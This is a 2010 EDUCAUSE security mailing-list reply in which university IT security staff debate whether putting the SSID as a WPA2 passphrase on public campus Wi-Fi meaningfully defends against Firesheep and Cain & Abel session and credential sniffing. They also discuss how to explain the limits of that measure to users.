Educause Security Discussion mailing list archives
Re: Firesheep/Cain& Able
From: Matt Giannetto <MGiannetto () MC3 EDU>
Date: Wed, 3 Nov 2010 14:42:32 -0400
...and the false sense of security. I'm struggling with this as well as one of my network admins suggested this. Technically it limits the effect of Firesheep alone, but to me it seems like fixing the threat and not the vulnerability. Nothing stops someone from using Cain & Abel once they connect to the password-protected network. Sure it's better than being wide open, but telling someone "we did it to protect from Firesheep" when it only kinda protects from Firesheep in certain situations is hard to message properly and leaves users exposed. It's a false sense of security. And it could be useless against the next attack tool, leaving us to explain to our users, "Well, the password works for 'Firesheep', but it doesn't really help with 'Firegoat', so now you have to be careful on password-protected public networks...". Again-- hard to message. Which brings up the question, how would we educate users that distinguish a password-protected public wireless network from a trusted wireless network? Users have a clear understanding of what a public, untrusted network is (well, in general), but throwing a password on it muddies the water. Another question-- if you password-protect your public wireless by using the SSID as the password because its "more secure", are your users going to incorrectly think that's sufficient for their home networks? One of the worst part of this solution is that once you put a password on it to thwart Firesheep now, it's hard to go back after its hype and popularity dies down. I'm not saying it's a bad solution as much as I'm saying it's a dangerous solution. Unfortunately, telling users that they shouldn't use social networking sites on public Wi-Fi is as well, because its (arguably) unreasonable/no one listens. Thanks, Matt Giannetto Director of IT Security Montgomery County Community College mgiannetto () mc3 edu | (215) 619-7442 -----Original Message----- From: John Ladwig [mailto:John.Ladwig () CSU MNSCU EDU] Sent: Monday, November 01, 2010 10:55 AM Subject: Re: Firesheep/Cain& Able I'm wrestling again with the wisdom of turning WPA2-PSK on for all currently-unencrypted captive-portal type WLANs, using the SSID as the PSK, in order to get radio-side client-client isolation. There's just that nagging question of user experience, and helpdesk calls... -jml -----Original Message----- From: Hudson, Edward Sent: 2010-11-01 09:41:33 To: Hudson, Edward;The EDUCAUSE Security Constituent Group Listserv Cc: Subject: [SECURITY] Firesheep/Cain& Able In light of the recent attention to "Firesheep" I am wondering if anyone is having issues and how they are addressing? When used in conjunction with "Cain&Able" it appears able to sniff both wired and wireless traffic for login credentials and execute ARP Poisoning. TIA EH Ed Hudson, CISM Information Security Office California State University, Chico www.csuchico.edu/ires/security<http://www.csuchico.edu/ires/security> Office: (530) 898-6307 Cell: 707-799-3250 ewhudson () csuchico edu Montgomery County Community College is proud to be the #1 ranked technology-savvy community college in the nation, as determined by the Center for Digital Education and Converge magazine.
Current thread:
- Re: Firesheep/Cain& Able, (continued)
- Re: Firesheep/Cain& Able Michael Horne (Nov 01)
- Re: Firesheep/Cain& Able Isac Balder (Nov 01)
- Re: Firesheep/Cain& Able Valdis Kletnieks (Nov 01)
- Re: Firesheep/Cain& Able David Gillett (Nov 03)
- Re: Firesheep/Cain& Able Foerst, Daniel P. (Nov 02)
- Re: Firesheep/Cain& Able Webb, Justin (Nov 02)
- Re: Firesheep/Cain& Able Greg Williams (Nov 02)
- Re: Firesheep/Cain& Able Alex Keller (Nov 02)
- Re: Firesheep/Cain& Able Valdis Kletnieks (Nov 01)
- Re: Firesheep/Cain& Able John Ladwig (Nov 01)
- Re: Firesheep/Cain& Able John Ladwig (Nov 02)
- Re: Firesheep/Cain& Able Matt Giannetto (Nov 03)